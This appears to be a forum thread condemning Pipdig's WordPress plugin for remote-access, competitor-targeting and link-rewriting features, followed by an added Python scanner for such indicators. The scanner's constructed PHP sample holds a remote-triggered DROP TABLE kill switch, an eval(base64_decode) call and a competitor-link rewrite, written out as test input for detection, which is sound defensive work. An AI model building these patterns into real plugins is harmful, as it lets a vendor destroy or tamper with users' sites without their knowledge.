by duskwuff 2643 days ago
Pathetic.

If I'm reading this correctly, they're essentially admitting to some of the malicious features described by the researcher, but claiming that they were included for support purposes, or as a way of sabotaging sites using pirated versions of their plugin.

1. Including features which can remotely grant unauthorized access or cause damage to a user's web site is inappropriate under any circumstances. Even if they're your customers, or if they aren't your customers, or whatever. You don't do that.

2. Pipdig hasn't come up with any sensible explanation for why their license checks were pointed at a competitor's web site. It's not even clear why the license check would be architected in a way that allowed for this.

3. Altering users' site content to change links from Blogerize to Pipdig is beyond the pale. Pipdig's explanation of this feature is incoherent; it isn't even consistent with the behavior of the code presented.

4. Obfuscating the code surrounding all of these questionable bits of functionality stinks of wrongdoing. It's understandable for a license check to be a little obfuscated, perhaps, but there's no reason why a remote administration feature should be (even if it had any reason for existing).

2 comments

We're just a poor small company... that acts maliciously against our competitors using the code we sell to clients who have no idea! We're sorry we got caught, and it's hard to explain why this isn't bad.

Oh, and they deleted repos apparently. Gotta hide the evidence.

Re #2, it's clear from reading the code that the function has absolutely nothing to do with a licensing check anyway.
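The four indicators duskwuff's post enumerates (remote calls to a host that is not the vendor's, a content filter that rewrites links from one domain to another, a destructive operation reachable from a remote response, and obfuscation wrappers around any of it) are exactly what a reviewer scans a plugin for before installing it. The script below is an added example written for this thread; it is not Pipdig's code, not the researcher's code, and the PHP sample it scans is constructed for the demo with hypothetical hostnames and a hypothetical function name. `VENDOR_HOSTS` is an assumed allow-list of hosts a vendor could legitimately contact; the regexes are heuristics, not a PHP parser.

```python
"""Static indicator scan over a WordPress plugin's PHP source.

Added example for this thread, not code from the original page or from
Pipdig. The PHP sample is constructed and uses hypothetical hostnames; it
is not the plugin the researcher analysed. The scan flags the categories
the post lists: remote fetches to hosts other than the vendor's, content
filters that rewrite domains, destructive operations reachable from a
remote response, and obfuscation wrappers.
"""
import re
from collections import defaultdict

# Constructed sample plugin (hypothetical names and hosts throughout).
SAMPLE_PLUGIN = r'''<?php
add_action('init', 'pd_check');
function pd_check() {
    $r = wp_remote_get('https://license.example-vendor.test/check?site=' . home_url());
    $c = wp_remote_get('https://competitor.example.test/wp-admin/admin-ajax.php');
    $cmd = json_decode(wp_remote_retrieve_body($r), true);
    if ($cmd['action'] === 'wipe') {
        $GLOBALS['wpdb']->query("DROP TABLE wp_posts");
    }
    eval(base64_decode('ZWNobyAnaGknOw=='));
}
add_filter('the_content', function ($html) {
    return str_replace('blogerize.example', 'pipdig.example', $html);
});
'''

# Hosts the vendor could plausibly contact for a real license check (assumption).
VENDOR_HOSTS = {"license.example-vendor.test"}

HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
REMOTE_CALL_RE = re.compile(r"\b(wp_remote_(?:get|post)|curl_exec|file_get_contents)\s*\(")
RESPONSE_RE = re.compile(r"\b(wp_remote_retrieve_body|curl_exec|json_decode)\s*\(")
OBFUSCATION_RE = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13|create_function)\s*\(")
DESTRUCTIVE_RE = re.compile(r"(DROP\s+TABLE|TRUNCATE|wp_delete_post|wp_delete_user|unlink)", re.I)
CONTENT_FILTER_RE = re.compile(r"add_filter\(\s*['\"](the_content|the_excerpt|wp_nav_menu_items)['\"]")
# A string replace whose search literal looks like a domain (a dot followed by letters).
DOMAIN_REPLACE_RE = re.compile(r"\b(str_replace|preg_replace)\s*\(\s*['\"][^'\"]*\.[a-z]+[^'\"]*['\"]")
FUNCTION_RE = re.compile(r"\bfunction\s+(\w+)\s*\(")


def named_function_spans(lines):
    """Return (name, start_line, end_line) for each named function, by brace counting.

    Braces inside string literals are not skipped; good enough for an indicator scan.
    """
    spans, current, depth = [], None, 0
    for n, line in enumerate(lines, 1):
        m = FUNCTION_RE.search(line)
        if current is None and m:
            current, depth = (m.group(1), n), 0
        if current is not None:
            depth += line.count("{") - line.count("}")
            if depth == 0 and "}" in line:
                spans.append((current[0], current[1], n))
                current = None
    return spans


def scan(source, vendor_hosts=VENDOR_HOSTS):
    """Map indicator category -> list of (line, detail) tuples."""
    findings = defaultdict(list)
    lines = source.splitlines()
    for n, line in enumerate(lines, 1):
        if REMOTE_CALL_RE.search(line):
            for host in HOST_RE.findall(line):
                if host not in vendor_hosts:
                    findings["third_party_remote_call"].append((n, host))
        for fn in OBFUSCATION_RE.findall(line):
            findings["obfuscation"].append((n, fn))
        for op in DESTRUCTIVE_RE.findall(line):
            findings["destructive_operation"].append((n, op))
        m = CONTENT_FILTER_RE.search(line)
        if m:
            # Look a few lines into the filter callback for a domain rewrite.
            for k in range(n, min(n + 6, len(lines)) + 1):
                if DOMAIN_REPLACE_RE.search(lines[k - 1]):
                    findings["content_link_rewrite"].append((k, m.group(1)))
                    break
    # A destructive op in the same function that reads a remote response is a remote kill switch.
    for name, start, end in named_function_spans(lines):
        body = "\n".join(lines[start - 1:end])
        if RESPONSE_RE.search(body) and DESTRUCTIVE_RE.search(body):
            findings["remote_triggered_destruction"].append((start, name))
    return dict(findings)


def verdict(findings):
    """Severity comes from the combination of indicators, not from any single hit."""
    if "remote_triggered_destruction" in findings or "content_link_rewrite" in findings:
        return "malicious"
    if "third_party_remote_call" in findings and "obfuscation" in findings:
        return "suspicious"
    return "clean" if not findings else "review"


if __name__ == "__main__":
    result = scan(SAMPLE_PLUGIN)
    for category, hits in sorted(result.items()):
        print(f"{category}: {hits}")
    print("verdict:", verdict(result))
```

Run it against a real plugin with `scan(open("plugin.php").read(), vendor_hosts={...})` and treat the output as a triage list, not a proof: a single `base64_decode` or `unlink` is common in benign code, which is why `verdict` only calls something malicious when a content filter rewrites a domain or a destructive operation sits in the same function that reads a remote response.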